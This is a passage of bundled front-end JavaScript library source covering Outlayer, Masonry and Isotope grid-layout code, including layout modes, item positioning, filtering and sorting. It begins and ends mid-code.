this._getItemLayoutPosition( item ); // enqueue position.item = item; position.isInstant = isInstant || item.isLayoutInstant; queue.push( position ); }, this ); this._processLayoutQueue( queue ); }; /** * get item layout position * @param {Outlayer.Item} item * @returns {Object} x and y position */ proto._getItemLayoutPosition = function( /* item */ ) { return { x: 0, y: 0 }; }; /** * iterate over array and position each item * Reason being - separating this logic prevents 'layout invalidation' * thx @paul_irish * @param {Array} queue */ proto._processLayoutQueue = function( queue ) { this.updateStagger(); queue.forEach( function( obj, i ) { this._positionItem( obj.item, obj.x, obj.y, obj.isInstant, i ); }, this ); }; // set stagger from option in milliseconds number proto.updateStagger = function() { var stagger = this.options.stagger; if ( stagger === null || stagger === undefined ) { this.stagger = 0; return; } this.stagger = getMilliseconds( stagger ); return this.stagger; }; /** * Sets position of item in DOM * @param {Outlayer.Item} item * @param {Number} x - horizontal position * @param {Number} y - vertical position * @param {Boolean} isInstant - disables transitions */ proto._positionItem = function( item, x, y, isInstant, i ) { if ( isInstant ) { // if not transition, just set CSS item.goTo( x, y ); } else { item.stagger( i * this.stagger ); item.moveTo( x, y ); } }; /** * Any logic you want to do after each layout, * i.e. size the container */ proto._postLayout = function() { this.resizeContainer(); }; proto.resizeContainer = function() { var isResizingContainer = this._getOption('resizeContainer'); if ( !isResizingContainer ) { return; } var size = this._getContainerSize(); if ( size ) { this._setContainerMeasure( size.width, true ); this._setContainerMeasure( size.height, false ); } }; /** * Sets width or height of container if returned * @returns {Object} size * @param {Number} width * @param {Number} height */ proto._getContainerSize = noop; /** * @param {Number} measure - size of width or height * @param {Boolean} isWidth */ proto._setContainerMeasure = function( measure, isWidth ) { if ( measure === undefined ) { return; } var elemSize = this.size; // add padding and border width if border box if ( elemSize.isBorderBox ) { measure += isWidth ? elemSize.paddingLeft + elemSize.paddingRight + elemSize.borderLeftWidth + elemSize.borderRightWidth : elemSize.paddingBottom + elemSize.paddingTop + elemSize.borderTopWidth + elemSize.borderBottomWidth; } measure = Math.max( measure, 0 ); this.element.style[ isWidth ? 'width' : 'height' ] = measure + 'px'; }; /** * emit eventComplete on a collection of items events * @param {String} eventName * @param {Array} items - Outlayer.Items */ proto._emitCompleteOnItems = function( eventName, items ) { var _this = this; function onComplete() { _this.dispatchEvent( eventName + 'Complete', null, [ items ] ); } var count = items.length; if ( !items || !count ) { onComplete(); return; } var doneCount = 0; function tick() { doneCount++; if ( doneCount == count ) { onComplete(); } } // bind callback items.forEach( function( item ) { item.once( eventName, tick ); }); }; /** * emits events via EvEmitter and jQuery events * @param {String} type - name of event * @param {Event} event - original event * @param {Array} args - extra arguments */ proto.dispatchEvent = function( type, event, args ) { // add original event to arguments var emitArgs = event ? [ event ].concat( args ) : args; this.emitEvent( type, emitArgs ); if ( jQuery ) { // set this.$element this.$element = this.$element || jQuery( this.element ); if ( event ) { // create jQuery event var $event = jQuery.Event( event ); $event.type = type; this.$element.trigger( $event, args ); } else { // just trigger with type if no event available this.$element.trigger( type, args ); } } }; // -------------------------- ignore & stamps -------------------------- // /** * keep item in collection, but do not lay it out * ignored items do not get skipped in layout * @param {Element} elem */ proto.ignore = function( elem ) { var item = this.getItem( elem ); if ( item ) { item.isIgnored = true; } }; /** * return item to layout collection * @param {Element} elem */ proto.unignore = function( elem ) { var item = this.getItem( elem ); if ( item ) { delete item.isIgnored; } }; /** * adds elements to stamps * @param {NodeList, Array, Element, or String} elems */ proto.stamp = function( elems ) { elems = this._find( elems ); if ( !elems ) { return; } this.stamps = this.stamps.concat( elems ); // ignore elems.forEach( this.ignore, this ); }; /** * removes elements to stamps * @param {NodeList, Array, or Element} elems */ proto.unstamp = function( elems ) { elems = this._find( elems ); if ( !elems ){ return; } elems.forEach( function( elem ) { // filter out removed stamp elements utils.removeFrom( this.stamps, elem ); this.unignore( elem ); }, this ); }; /** * finds child elements * @param {NodeList, Array, Element, or String} elems * @returns {Array} elems */ proto._find = function( elems ) { if ( !elems ) { return; } // if string, use argument as selector string if ( typeof elems == 'string' ) { elems = this.element.querySelectorAll( elems ); } elems = utils.makeArray( elems ); return elems; }; proto._manageStamps = function() { if ( !this.stamps || !this.stamps.length ) { return; } this._getBoundingRect(); this.stamps.forEach( this._manageStamp, this ); }; // update boundingLeft / Top proto._getBoundingRect = function() { // get bounding rect for container element var boundingRect = this.element.getBoundingClientRect(); var size = this.size; this._boundingRect = { left: boundingRect.left + size.paddingLeft + size.borderLeftWidth, top: boundingRect.top + size.paddingTop + size.borderTopWidth, right: boundingRect.right - ( size.paddingRight + size.borderRightWidth ), bottom: boundingRect.bottom - ( size.paddingBottom + size.borderBottomWidth ) }; }; /** * @param {Element} stamp **/ proto._manageStamp = noop; /** * get x/y position of element relative to container element * @param {Element} elem * @returns {Object} offset - has left, top, right, bottom */ proto._getElementOffset = function( elem ) { var boundingRect = elem.getBoundingClientRect(); var thisRect = this._boundingRect; var size = getSize( elem ); var offset = { left: boundingRect.left - thisRect.left - size.marginLeft, top: boundingRect.top - thisRect.top - size.marginTop, right: thisRect.right - boundingRect.right - size.marginRight, bottom: thisRect.bottom - boundingRect.bottom - size.marginBottom }; return offset; }; // -------------------------- resize -------------------------- // // enable event handlers for listeners // i.e. resize -> onresize proto.handleEvent = utils.handleEvent; /** * Bind layout to window resizing */ proto.bindResize = function() { window.addEventListener( 'resize', this ); this.isResizeBound = true; }; /** * Unbind layout to window resizing */ proto.unbindResize = function() { window.removeEventListener( 'resize', this ); this.isResizeBound = false; }; proto.onresize = function() { this.resize(); }; utils.debounceMethod( Outlayer, 'onresize', 100 ); proto.resize = function() { // don't trigger if size did not change // or if resize was unbound. See #9 if ( !this.isResizeBound || !this.needsResizeLayout() ) { return; } this.layout(); }; /** * check if layout is needed post layout * @returns Boolean */ proto.needsResizeLayout = function() { var size = getSize( this.element ); // check that this.size and size are there // IE8 triggers resize on body size change, so they might not be var hasSizes = this.size && size; return hasSizes && size.innerWidth !== this.size.innerWidth; }; // -------------------------- methods -------------------------- // /** * add items to Outlayer instance * @param {Array or NodeList or Element} elems * @returns {Array} items - Outlayer.Items **/ proto.addItems = function( elems ) { var items = this._itemize( elems ); // add items to collection if ( items.length ) { this.items = this.items.concat( items ); } return items; }; /** * Layout newly-appended item elements * @param {Array or NodeList or Element} elems */ proto.appended = function( elems ) { var items = this.addItems( elems ); if ( !items.length ) { return; } // layout and reveal just the new items this.layoutItems( items, true ); this.reveal( items ); }; /** * Layout prepended elements * @param {Array or NodeList or Element} elems */ proto.prepended = function( elems ) { var items = this._itemize( elems ); if ( !items.length ) { return; } // add items to beginning of collection var previousItems = this.items.slice(0); this.items = items.concat( previousItems ); // start new layout this._resetLayout(); this._manageStamps(); // layout new stuff without transition this.layoutItems( items, true ); this.reveal( items ); // layout previous items this.layoutItems( previousItems ); }; /** * reveal a collection of items * @param {Array of Outlayer.Items} items */ proto.reveal = function( items ) { this._emitCompleteOnItems( 'reveal', items ); if ( !items || !items.length ) { return; } var stagger = this.updateStagger(); items.forEach( function( item, i ) { item.stagger( i * stagger ); item.reveal(); }); }; /** * hide a collection of items * @param {Array of Outlayer.Items} items */ proto.hide = function( items ) { this._emitCompleteOnItems( 'hide', items ); if ( !items || !items.length ) { return; } var stagger = this.updateStagger(); items.forEach( function( item, i ) { item.stagger( i * stagger ); item.hide(); }); }; /** * reveal item elements * @param {Array}, {Element}, {NodeList} items */ proto.revealItemElements = function( elems ) { var items = this.getItems( elems ); this.reveal( items ); }; /** * hide item elements * @param {Array}, {Element}, {NodeList} items */ proto.hideItemElements = function( elems ) { var items = this.getItems( elems ); this.hide( items ); }; /** * get Outlayer.Item, given an Element * @param {Element} elem * @param {Function} callback * @returns {Outlayer.Item} item */ proto.getItem = function( elem ) { // loop through items to get the one that matches for ( var i=0; i < this.items.length; i++ ) { var item = this.items[i]; if ( item.element == elem ) { // return item return item; } } }; /** * get collection of Outlayer.Items, given Elements * @param {Array} elems * @returns {Array} items - Outlayer.Items */ proto.getItems = function( elems ) { elems = utils.makeArray( elems ); var items = []; elems.forEach( function( elem ) { var item = this.getItem( elem ); if ( item ) { items.push( item ); } }, this ); return items; }; /** * remove element(s) from instance and DOM * @param {Array or NodeList or Element} elems */ proto.remove = function( elems ) { var removeItems = this.getItems( elems ); this._emitCompleteOnItems( 'remove', removeItems ); // bail if no items to remove if ( !removeItems || !removeItems.length ) { return; } removeItems.forEach( function( item ) { item.remove(); // remove item from collection utils.removeFrom( this.items, item ); }, this ); }; // ----- destroy ----- // // remove and disable Outlayer instance proto.destroy = function() { // clean up dynamic styles var style = this.element.style; style.height = ''; style.position = ''; style.width = ''; // destroy items this.items.forEach( function( item ) { item.destroy(); }); this.unbindResize(); var id = this.element.outlayerGUID; delete instances[ id ]; // remove reference to instance by id delete this.element.outlayerGUID; // remove data for jQuery if ( jQuery ) { jQuery.removeData( this.element, this.constructor.namespace ); } }; // -------------------------- data -------------------------- // /** * get Outlayer instance from element * @param {Element} elem * @returns {Outlayer} */ Outlayer.data = function( elem ) { elem = utils.getQueryElement( elem ); var id = elem && elem.outlayerGUID; return id && instances[ id ]; }; // -------------------------- create Outlayer class -------------------------- // /** * create a layout class * @param {String} namespace */ Outlayer.create = function( namespace, options ) { // sub-class Outlayer var Layout = subclass( Outlayer ); // apply new options and compatOptions Layout.defaults = utils.extend( {}, Outlayer.defaults ); utils.extend( Layout.defaults, options ); Layout.compatOptions = utils.extend( {}, Outlayer.compatOptions ); Layout.namespace = namespace; Layout.data = Outlayer.data; // sub-class Item Layout.Item = subclass( Item ); // -------------------------- declarative -------------------------- // utils.htmlInit( Layout, namespace ); // -------------------------- jQuery bridge -------------------------- // // make into jQuery plugin if ( jQuery && jQuery.bridget ) { jQuery.bridget( namespace, Layout ); } return Layout; }; function subclass( Parent ) { function SubClass() { Parent.apply( this, arguments ); } SubClass.prototype = Object.create( Parent.prototype ); SubClass.prototype.constructor = SubClass; return SubClass; } // ----- helpers ----- // // how many milliseconds are in each unit var msUnits = { ms: 1, s: 1000 }; // munge time-like parameter into millisecond number // '0.4s' -> 40 function getMilliseconds( time ) { if ( typeof time == 'number' ) { return time; } var matches = time.match( /(^\d*\.?\d*)(\w*)/ ); var num = matches && matches[1]; var unit = matches && matches[2]; if ( !num.length ) { return 0; } num = parseFloat( num ); var mult = msUnits[ unit ] || 1; return num * mult; } // ----- fin ----- // // back in global Outlayer.Item = Item; return Outlayer; })); /** * Isotope Item **/ ( function( window, factory ) { // universal module definition /* jshint strict: false */ /*globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD define( 'isotope-layout/js/item',[ 'outlayer/outlayer' ], factory ); } else if ( typeof module == 'object' && module.exports ) { // CommonJS module.exports = factory( require('outlayer') ); } else { // browser global window.Isotope = window.Isotope || {}; window.Isotope.Item = factory( window.Outlayer ); } }( window, function factory( Outlayer ) { 'use strict'; // -------------------------- Item -------------------------- // // sub-class Outlayer Item function Item() { Outlayer.Item.apply( this, arguments ); } var proto = Item.prototype = Object.create( Outlayer.Item.prototype ); var _create = proto._create; proto._create = function() { // assign id, used for original-order sorting this.id = this.layout.itemGUID++; _create.call( this ); this.sortData = {}; }; proto.updateSortData = function() { if ( this.isIgnored ) { return; } // default sorters this.sortData.id = this.id; // for backward compatibility this.sortData['original-order'] = this.id; this.sortData.random = Math.random(); // go thru getSortData obj and apply the sorters var getSortData = this.layout.options.getSortData; var sorters = this.layout._sorters; for ( var key in getSortData ) { var sorter = sorters[ key ]; this.sortData[ key ] = sorter( this.element, this ); } }; var _destroy = proto.destroy; proto.destroy = function() { // call super _destroy.apply( this, arguments ); // reset display, #741 this.css({ display: '' }); }; return Item; })); /** * Isotope LayoutMode */ ( function( window, factory ) { // universal module definition /* jshint strict: false */ /*globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD define( 'isotope-layout/js/layout-mode',[ 'get-size/get-size', 'outlayer/outlayer' ], factory ); } else if ( typeof module == 'object' && module.exports ) { // CommonJS module.exports = factory( require('get-size'), require('outlayer') ); } else { // browser global window.Isotope = window.Isotope || {}; window.Isotope.LayoutMode = factory( window.getSize, window.Outlayer ); } }( window, function factory( getSize, Outlayer ) { 'use strict'; // layout mode class function LayoutMode( isotope ) { this.isotope = isotope; // link properties if ( isotope ) { this.options = isotope.options[ this.namespace ]; this.element = isotope.element; this.items = isotope.filteredItems; this.size = isotope.size; } } var proto = LayoutMode.prototype; /** * some methods should just defer to default Outlayer method * and reference the Isotope instance as `this` **/ var facadeMethods = [ '_resetLayout', '_getItemLayoutPosition', '_manageStamp', '_getContainerSize', '_getElementOffset', 'needsResizeLayout', '_getOption' ]; facadeMethods.forEach( function( methodName ) { proto[ methodName ] = function() { return Outlayer.prototype[ methodName ].apply( this.isotope, arguments ); }; }); // ----- ----- // // for horizontal layout modes, check vertical size proto.needsVerticalResizeLayout = function() { // don't trigger if size did not change var size = getSize( this.isotope.element ); // check that this.size and size are there // IE8 triggers resize on body size change, so they might not be var hasSizes = this.isotope.size && size; return hasSizes && size.innerHeight != this.isotope.size.innerHeight; }; // ----- measurements ----- // proto._getMeasurement = function() { this.isotope._getMeasurement.apply( this, arguments ); }; proto.getColumnWidth = function() { this.getSegmentSize( 'column', 'Width' ); }; proto.getRowHeight = function() { this.getSegmentSize( 'row', 'Height' ); }; /** * get columnWidth or rowHeight * segment: 'column' or 'row' * size 'Width' or 'Height' **/ proto.getSegmentSize = function( segment, size ) { var segmentName = segment + size; var outerSize = 'outer' + size; // columnWidth / outerWidth // rowHeight / outerHeight this._getMeasurement( segmentName, outerSize ); // got rowHeight or columnWidth, we can chill if ( this[ segmentName ] ) { return; } // fall back to item of first element var firstItemSize = this.getFirstItemSize(); this[ segmentName ] = firstItemSize && firstItemSize[ outerSize ] || // or size of container this.isotope.size[ 'inner' + size ]; }; proto.getFirstItemSize = function() { var firstItem = this.isotope.filteredItems[0]; return firstItem && firstItem.element && getSize( firstItem.element ); }; // ----- methods that should reference isotope ----- // proto.layout = function() { this.isotope.layout.apply( this.isotope, arguments ); }; proto.getSize = function() { this.isotope.getSize(); this.size = this.isotope.size; }; // -------------------------- create -------------------------- // LayoutMode.modes = {}; LayoutMode.create = function( namespace, options ) { function Mode() { LayoutMode.apply( this, arguments ); } Mode.prototype = Object.create( proto ); Mode.prototype.constructor = Mode; // default options if ( options ) { Mode.options = options; } Mode.prototype.namespace = namespace; // register in Isotope LayoutMode.modes[ namespace ] = Mode; return Mode; }; return LayoutMode; })); /*! * Masonry v4.2.1 * Cascading grid layout library * https://masonry.desandro.com * MIT License * by David DeSandro */ ( function( window, factory ) { // universal module definition /* jshint strict: false */ /*globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD define( 'masonry-layout/masonry',[ 'outlayer/outlayer', 'get-size/get-size' ], factory ); } else if ( typeof module == 'object' && module.exports ) { // CommonJS module.exports = factory( require('outlayer'), require('get-size') ); } else { // browser global window.Masonry = factory( window.Outlayer, window.getSize ); } }( window, function factory( Outlayer, getSize ) { // -------------------------- masonryDefinition -------------------------- // // create an Outlayer layout class var Masonry = Outlayer.create('masonry'); // isFitWidth -> fitWidth Masonry.compatOptions.fitWidth = 'isFitWidth'; var proto = Masonry.prototype; proto._resetLayout = function() { this.getSize(); this._getMeasurement( 'columnWidth', 'outerWidth' ); this._getMeasurement( 'gutter', 'outerWidth' ); this.measureColumns(); // reset column Y this.colYs = []; for ( var i=0; i < this.cols; i++ ) { this.colYs.push( 0 ); } this.maxY = 0; this.horizontalColIndex = 0; }; proto.measureColumns = function() { this.getContainerWidth(); // if columnWidth is 0, default to outerWidth of first item if ( !this.columnWidth ) { var firstItem = this.items[0]; var firstItemElem = firstItem && firstItem.element; // columnWidth fall back to item of first element this.columnWidth = firstItemElem && getSize( firstItemElem ).outerWidth || // if first elem has no width, default to size of container this.containerWidth; } var columnWidth = this.columnWidth += this.gutter; // calculate columns var containerWidth = this.containerWidth + this.gutter; var cols = containerWidth / columnWidth; // fix rounding errors, typically with gutters var excess = columnWidth - containerWidth % columnWidth; // if overshoot is less than a pixel, round up, otherwise floor it var mathMethod = excess && excess < 1 ? 'round' : 'floor'; cols = Math[ mathMethod ]( cols ); this.cols = Math.max( cols, 1 ); }; proto.getContainerWidth = function() { // container is parent if fit width var isFitWidth = this._getOption('fitWidth'); var container = isFitWidth ? this.element.parentNode : this.element; // check that this.size and size are there // IE8 triggers resize on body size change, so they might not be var size = getSize( container ); this.containerWidth = size && size.innerWidth; }; proto._getItemLayoutPosition = function( item ) { item.getSize(); // how many columns does this brick span var remainder = item.size.outerWidth % this.columnWidth; var mathMethod = remainder && remainder < 1 ? 'round' : 'ceil'; // round if off by 1 pixel, otherwise use ceil var colSpan = Math[ mathMethod ]( item.size.outerWidth / this.columnWidth ); colSpan = Math.min( colSpan, this.cols ); // use horizontal or top column position var colPosMethod = this.options.horizontalOrder ? '_getHorizontalColPosition' : '_getTopColPosition'; var colPosition = this[ colPosMethod ]( colSpan, item ); // position the brick var position = { x: this.columnWidth * colPosition.col, y: colPosition.y }; // apply setHeight to necessary columns var setHeight = colPosition.y + item.size.outerHeight; var setMax = colSpan + colPosition.col; for ( var i = colPosition.col; i < setMax; i++ ) { this.colYs[i] = setHeight; } return position; }; proto._getTopColPosition = function( colSpan ) { var colGroup = this._getTopColGroup( colSpan ); // get the minimum Y value from the columns var minimumY = Math.min.apply( Math, colGroup ); return { col: colGroup.indexOf( minimumY ), y: minimumY, }; }; /** * @param {Number} colSpan - number of columns the element spans * @returns {Array} colGroup */ proto._getTopColGroup = function( colSpan ) { if ( colSpan < 2 ) { // if brick spans only one column, use all the column Ys return this.colYs; } var colGroup = []; // how many different places could this brick fit horizontally var groupCount = this.cols + 1 - colSpan; // for each group potential horizontal position for ( var i = 0; i < groupCount; i++ ) { colGroup[i] = this._getColGroupY( i, colSpan ); } return colGroup; }; proto._getColGroupY = function( col, colSpan ) { if ( colSpan < 2 ) { return this.colYs[ col ]; } // make an array of colY values for that one group var groupColYs = this.colYs.slice( col, col + colSpan ); // and get the max value of the array return Math.max.apply( Math, groupColYs ); }; // get column position based on horizontal index. #873 proto._getHorizontalColPosition = function( colSpan, item ) { var col = this.horizontalColIndex % this.cols; var isOver = colSpan > 1 && col + colSpan > this.cols; // shift to next row if item can't fit on current row col = isOver ? 0 : col; // don't let zero-size items take up space var hasSize = item.size.outerWidth && item.size.outerHeight; this.horizontalColIndex = hasSize ? col + colSpan : this.horizontalColIndex; return { col: col, y: this._getColGroupY( col, colSpan ), }; }; proto._manageStamp = function( stamp ) { var stampSize = getSize( stamp ); var offset = this._getElementOffset( stamp ); // get the columns that this stamp affects var isOriginLeft = this._getOption('originLeft'); var firstX = isOriginLeft ? offset.left : offset.right; var lastX = firstX + stampSize.outerWidth; var firstCol = Math.floor( firstX / this.columnWidth ); firstCol = Math.max( 0, firstCol ); var lastCol = Math.floor( lastX / this.columnWidth ); // lastCol should not go over if multiple of columnWidth #425 lastCol -= lastX % this.columnWidth ? 0 : 1; lastCol = Math.min( this.cols - 1, lastCol ); // set colYs to bottom of the stamp var isOriginTop = this._getOption('originTop'); var stampMaxY = ( isOriginTop ? offset.top : offset.bottom ) + stampSize.outerHeight; for ( var i = firstCol; i <= lastCol; i++ ) { this.colYs[i] = Math.max( stampMaxY, this.colYs[i] ); } }; proto._getContainerSize = function() { this.maxY = Math.max.apply( Math, this.colYs ); var size = { height: this.maxY }; if ( this._getOption('fitWidth') ) { size.width = this._getContainerFitWidth(); } return size; }; proto._getContainerFitWidth = function() { var unusedCols = 0; // count unused columns var i = this.cols; while ( --i ) { if ( this.colYs[i] !== 0 ) { break; } unusedCols++; } // fit container to columns that have been used return ( this.cols - unusedCols ) * this.columnWidth - this.gutter; }; proto.needsResizeLayout = function() { var previousWidth = this.containerWidth; this.getContainerWidth(); return previousWidth != this.containerWidth; }; return Masonry; })); /*! * Masonry layout mode * sub-classes Masonry * https://masonry.desandro.com */ ( function( window, factory ) { // universal module definition /* jshint strict: false */ /*globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD define( 'isotope-layout/js/layout-modes/masonry',[ '../layout-mode', 'masonry-layout/masonry' ], factory ); } else if ( typeof module == 'object' && module.exports ) { // CommonJS module.exports = factory( require('../layout-mode'), require('masonry-layout') ); } else { // browser global factory( window.Isotope.LayoutMode, window.Masonry ); } }( window, function factory( LayoutMode, Masonry ) { 'use strict'; // -------------------------- masonryDefinition -------------------------- // // create an Outlayer layout class var MasonryMode = LayoutMode.create('masonry'); var proto = MasonryMode.prototype; var keepModeMethods = { _getElementOffset: true, layout: true, _getMeasurement: true }; // inherit Masonry prototype for ( var method in Masonry.prototype ) { // do not inherit mode methods if ( !keepModeMethods[ method ] ) { proto[ method ] = Masonry.prototype[ method ]; } } var measureColumns = proto.measureColumns; proto.measureColumns = function() { // set items, used if measuring first item this.items = this.isotope.filteredItems; measureColumns.call( this ); }; // point to mode options for fitWidth var _getOption = proto._getOption; proto._getOption = function( option ) { if ( option == 'fitWidth' ) { return this.options.isFitWidth !== undefined ? this.options.isFitWidth : this.options.fitWidth; } return _getOption.apply( this.isotope, arguments ); }; return MasonryMode; })); /** * fitRows layout mode */ ( function( window, factory ) { // universal module definition /* jshint strict: false */ /*globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD define( 'isotope-layout/js/layout-modes/fit-rows',[ '../layout-mode' ], factory ); } else if ( typeof exports == 'object' ) { // CommonJS module.exports = factory( require('../layout-mode') ); } else { // browser global factory( window.Isotope.LayoutMode ); } }( window, function factory( LayoutMode ) { 'use strict'; var FitRows = LayoutMode.create('fitRows'); var proto = FitRows.prototype; proto._resetLayout = function() { this.x = 0; this.y = 0; this.maxY = 0; this._getMeasurement( 'gutter', 'outerWidth' ); }; proto._getItemLayoutPosition = function( item ) { item.getSize(); var itemWidth = item.size.outerWidth + this.gutter; // if this element cannot fit in the current row var containerWidth = this.isotope.size.innerWidth + this.gutter; if ( this.x !== 0 && itemWidth + this.x > containerWidth ) { this.x = 0; this.y = this.maxY; } var position = { x: this.x, y: this.y }; this.maxY = Math.max( this.maxY, this.y + item.size.outerHeight ); this.x += itemWidth; return position; }; proto._getContainerSize = function() { return { height: this.maxY }; }; return FitRows; })); /** * vertical layout mode */ ( function( window, factory ) { // universal module definition /* jshint strict: false */ /*globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD define( 'isotope-layout/js/layout-modes/vertical',[ '../layout-mode' ], factory ); } else if ( typeof module == 'object' && module.exports ) { // CommonJS module.exports = factory( require('../layout-mode') ); } else { // browser global factory( window.Isotope.LayoutMode ); } }( window, function factory( LayoutMode ) { 'use strict'; var Vertical = LayoutMode.create( 'vertical', { horizontalAlignment: 0 }); var proto = Vertical.prototype; proto._resetLayout = function() { this.y = 0; }; proto._getItemLayoutPosition = function( item ) { item.getSize(); var x = ( this.isotope.size.innerWidth - item.size.outerWidth ) * this.options.horizontalAlignment; var y = this.y; this.y += item.size.outerHeight; return { x: x, y: y }; }; proto._getContainerSize = function() { return { height: this.y }; }; return Vertical; })); /*! * Isotope v3.0.6 * * Licensed GPLv3 for open source use * or Isotope Commercial License for commercial use * * https://isotope.metafizzy.co * Copyright 2010-2018 Metafizzy */ ( function( window, factory ) { // universal module definition /* jshint strict: false */ /*globals define, module, require */ if ( typeof define == 'function' && define.amd ) { // AMD define( [ 'outlayer/outlayer', 'get-size/get-size', 'desandro-matches-selector/matches-selector', 'fizzy-ui-utils/utils', 'isotope-layout/js/item', 'isotope-layout/js/layout-mode', // include default layout modes 'isotope-layout/js/layout-modes/masonry', 'isotope-layout/js/layout-modes/fit-rows', 'isotope-layout/js/layout-modes/vertical' ], function( Outlayer, getSize, matchesSelector, utils, Item, LayoutMode ) { return factory( window, Outlayer, getSize, matchesSelector, utils, Item, LayoutMode ); }); } else if ( typeof module == 'object' && module.exports ) { // CommonJS module.exports = factory( window, require('outlayer'), require('get-size'), require('desandro-matches-selector'), require('fizzy-ui-utils'), require('isotope-layout/js/item'), require('isotope-layout/js/layout-mode'), // include default layout modes require('isotope-layout/js/layout-modes/masonry'), require('isotope-layout/js/layout-modes/fit-rows'), require('isotope-layout/js/layout-modes/vertical') ); } else { // browser global window.Isotope = factory( window, window.Outlayer, window.getSize, window.matchesSelector, window.fizzyUIUtils, window.Isotope.Item, window.Isotope.LayoutMode ); } }( window, function factory( window, Outlayer, getSize, matchesSelector, utils, Item, LayoutMode ) { // -------------------------- vars -------------------------- // var jQuery = window.jQuery; // -------------------------- helpers -------------------------- // var trim = String.prototype.trim ? function( str ) { return str.trim(); } : function( str ) { return str.replace( /^\s+|\s+$/g, '' ); }; // -------------------------- isotopeDefinition -------------------------- // // create an Outlayer layout class var Isotope = Outlayer.create( 'isotope', { layoutMode: 'masonry', isJQueryFiltering: true, sortAscending: true }); Isotope.Item = Item; Isotope.LayoutMode = LayoutMode; var proto = Isotope.prototype; proto._create = function() { this.itemGUID = 0; // functions that sort items this._sorters = {}; this._getSorters(); // call super Outlayer.prototype._create.call( this ); // create layout modes this.modes = {}; // start filteredItems with all items this.filteredItems = this.items; // keep of track of sortBys this.sortHistory = [ 'original-order' ]; // create from registered layout modes for ( var name in LayoutMode.modes ) { this._initLayoutMode( name ); } }; proto.reloadItems = function() { // reset item ID counter this.itemGUID = 0; // call super Outlayer.prototype.reloadItems.call( this ); }; proto._itemize = function() { var items = Outlayer.prototype._itemize.apply( this, arguments ); // assign ID for original-order for ( var i=0; i < items.length; i++ ) { var item = items[i]; item.id = this.itemGUID++; } this._updateItemsSortData( items ); return items; }; // -------------------------- layout -------------------------- // proto._initLayoutMode = function( name ) { var Mode = LayoutMode.modes[ name ]; // set mode options // HACK extend initial options, back-fill in default options var initialOpts = this.options[ name ] || {}; this.options[ name ] = Mode.options ? utils.extend( Mode.options, initialOpts ) : initialOpts; // init layout mode instance this.modes[ name ] = new Mode( this ); }; proto.layout = function() { // if first time doing layout, do all magic if ( !this._isLayoutInited && this._getOption('initLayout') ) { this.arrange(); return; } this._layout(); }; // private method to be used in layout() & magic() proto._layout = function() { // don't animate first layout var isInstant = this._getIsInstant(); // layout flow this._resetLayout(); this._manageStamps(); this.layoutItems( this.filteredItems, isInstant ); // flag for initalized this._isLayoutInited = true; }; // filter + sort + layout proto.arrange = function( opts ) { // set any options pass this.option( opts ); this._getIsInstant(); // filter, sort, and layout // filter var filtered = this._filter( this.items ); this.filteredItems = filtered.matches; this._bindArrangeComplete(); if ( this._isInstant ) { this._noTransition( this._hideReveal, [ filtered ] ); } else { this._hideReveal( filtered ); } this._sort(); this._layout(); }; // alias to _init for main plugin method proto._init = proto.arrange; proto._hideReveal = function( filtered ) { this.reveal( filtered.needReveal ); this.hide( filtered.needHide ); }; // HACK // Don't animate/transition first layout // Or don't animate/transition other layouts proto._getIsInstant = function() { var isLayoutInstant = this._getOption('layoutInstant'); var isInstant = isLayoutInstant !== undefined ? isLayoutInstant : !this._isLayoutInited; this._isInstant = isInstant; return isInstant; }; // listen for layoutComplete, hideComplete and revealComplete // to trigger arrangeComplete proto._bindArrangeComplete = function() { // listen for 3 events to trigger arrangeComplete var isLayoutComplete, isHideComplete, isRevealComplete; var _this = this; function arrangeParallelCallback() { if ( isLayoutComplete && isHideComplete && isRevealComplete ) { _this.dispatchEvent( 'arrangeComplete', null, [ _this.filteredItems ] ); } } this.once( 'layoutComplete', function() { isLayoutComplete = true; arrangeParallelCallback(); }); this.once( 'hideComplete', function() { isHideComplete = true; arrangeParallelCallback(); }); this.once( 'revealComplete', function() { isRevealComplete = true; arrangeParallelCallback(); }); }; // -------------------------- filter -------------------------- // proto._filter = function( items ) { var filter = this.options.filter; filter = filter || '*'; var matches = []; var hiddenMatched = []; var visibleUnmatched = []; var test = this._getFilterTest( filter ); // test each item for ( var i=0; i < items.length; i++ ) { var item = items[i]; if ( item.isIgnored ) { continue; } // add item to either matched or unmatched group var isMatched = test( item ); // item.isFilterMatched = isMatched; // add to matches if its a match if ( isMatched ) { matches.push( item ); } // add to additional group if item needs to be hidden or revealed if ( isMatched && item.isHidden ) { hiddenMatched.push( item ); } else if ( !isMatched && !item.isHidden ) { visibleUnmatched.push( item ); } } // return collections of items to be manipulated return { matches: matches, needReveal: hiddenMatched, needHide: visibleUnmatched }; }; // get a jQuery, function, or a matchesSelector test given the filter proto._getFilterTest = function( filter ) { if ( jQuery && this.options.isJQueryFiltering ) { // use jQuery return function( item ) { return jQuery( item.element ).is( filter ); }; } if ( typeof filter == 'function' ) { // use filter as function return function( item ) { return filter( item.element ); }; } // default, use filter as selector string return function( item ) { return matchesSelector( item.element, filter ); }; }; // -------------------------- sorting -------------------------- // /** * @params {Array} elems * @public */ proto.updateSortData = function( elems ) { // get items var items; if ( elems ) { elems = utils.makeArray( elems ); items = this.getItems( elems ); } else { // update all items if no elems provided items = this.items; } this._getSorters(); this._updateItemsSortData( items ); }; proto._getSorters = function() { var getSortData = this.options.getSortData; for ( var key in getSortData ) { var sorter = getSortData[ key ]; this._sorters[ key ] = mungeSorter( sorter ); } }; /** * @params {Array} items - of Isotope.Items * @private */ proto._updateItemsSortData = function( items ) { // do not update if no items var len = items && items.length; for ( var i=0; len && i < len; i++ ) { var item = items[i]; item.updateSortData(); } }; // ----- munge sorter ----- // // encapsulate this, as we just need mungeSorter // other functions in here are just for munging var mungeSorter = ( function() { // add a magic layer to sorters for convienent shorthands // `.foo-bar` will use the text of .foo-bar querySelector // `[foo-bar]` will use attribute // you can also add parser // `.foo-bar parseInt` will parse that as a number function mungeSorter( sorter ) { // if not a string, return function or whatever it is if ( typeof sorter != 'string' ) { return sorter; } // parse the sorter string var args = trim( sorter ).split(' '); var query = args[0]; // check if query looks like [an-attribute] var attrMatch = query.match( /^\[(.+)\]$/ ); var attr = attrMatch && attrMatch[1]; var getValue = 